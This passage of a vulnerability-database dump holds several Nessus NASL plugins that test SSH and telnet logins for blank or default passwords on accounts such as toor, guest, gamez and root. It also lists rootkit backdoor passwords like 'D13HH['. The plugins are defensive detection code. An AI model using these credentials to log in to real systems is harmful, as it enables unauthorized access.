"ACCOUNT_TOOR.NASL", "href": "https://www.tenable.com/plugins/nessus/11252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"toor\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11252);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'toor' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'toor' has no password set. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:44", "description": "The account 'guest' has no password set. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'guest' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_GUEST.NASL", "href": "https://www.tenable.com/plugins/nessus/11240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"guest\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11240);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_bugtraq_id(30);\n\n script_name(english:\"Unpassworded 'guest' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a blank password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'guest' has no password set. \nAn attacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:45", "description": "The account 'EZsetup' has no password set. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'EZsetup' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_EZSETUP.NASL", "href": "https://www.tenable.com/plugins/nessus/11241", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"EZsetup\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11241);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'EZsetup' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'EZsetup' has no password set. \nAn attacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"os_fingerprint.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\n os = get_kb_item(\"Host/OS\");\n if ( os && \"IRIX\" >!< os )\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set, and the remote OS is not IRIX.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:46", "description": "The account 'root' has the password 'D13hh['. An attacker may use it to gain further privileges on this system. The presence of this account suggests the system may have the D13HH rootkit (typically found on Solaris systems).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (D13hh[) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ROOTKIT1BIS.NASL", "href": "https://www.tenable.com/plugins/nessus/11262", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"D13hh[\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11262);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (D13hh[) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' has the password 'D13hh['. An attacker may use it to\ngain further privileges on this system. The presence of this account\nsuggests the system may have the D13HH rootkit (typically found\non Solaris systems).\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:05:50", "description": "The account 'date' has no password set. An attacker can leverage this to gain access to the system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'date' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DATE.NASL", "href": "https://www.tenable.com/plugins/nessus/11248", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11248);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'date' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a blank password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'date' has no password set. An attacker can leverage\nthis to gain access to the system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:54", "description": "The account 'root' has the password 'D13HH['. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (D13HH[) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ROOTKIT1.NASL", "href": "https://www.tenable.com/plugins/nessus/11261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"D13HH[\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11261);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (D13HH[) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' has the password 'D13HH['. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:05:55", "description": "The account 'gamez' has the password 'lrkr0x'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (lrkr0x) for 'gamez' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_GAMEZ_LRKR0X.NASL", "href": "https://www.tenable.com/plugins/nessus/11263", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Netowrk Security, Inc.\n#\n\naccount = \"gamez\";\npassword = \"lrkr0x\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11263);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (lrkr0x) for 'gamez' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'gamez' has the password 'lrkr0x'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:56", "description": "The account 'root' on the remote host has the password 'root'. An attacker may leverage this issue to gain total control of the affected system. \n\nNote that, while SKIDATA Freemotion.Gate controllers are known to use these credentials, this plugin reports any time it finds a host using these credentials, regardless of its type.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (root) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ROOT.NASL", "href": "https://www.tenable.com/plugins/nessus/11255", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"root\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11255);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (root) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'root'. An\nattacker may leverage this issue to gain total control of the affected\nsystem. \n\nNote that, while SKIDATA Freemotion.Gate controllers are known to use\nthese credentials, this plugin reports any time it finds a host using\nthese credentials, regardless of its type.\");\n # https://packetstormsecurity.com/files/124079/Skidata-RFID-Freemotion.Gate-Remote-Command-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?016c4b65\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here :\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) 